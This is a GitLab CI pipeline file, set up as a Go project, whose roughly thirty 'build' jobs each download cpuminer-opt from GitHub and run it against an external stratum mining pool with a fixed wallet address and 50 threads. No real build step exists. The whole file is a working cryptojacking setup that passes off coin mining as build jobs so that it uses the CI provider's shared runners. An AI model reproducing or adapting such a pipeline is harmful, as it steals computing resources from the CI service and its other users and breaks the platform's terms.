image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_b:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_c:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50
    
build_d:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_e:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_f:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_g:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_h:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_i:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_j:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_k:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_l:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_m:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_n:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_o:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_p:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_q:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_r:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_s:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_t:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-avx -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_u:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-avx -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_v:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-avx -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_w:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_x:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_y:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_z:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_ab:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_ac:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_ad:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50

build_ae:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qfqw4e6692tjevvydzepnpjgmjyy6at8j6n8c7j.aseem -t50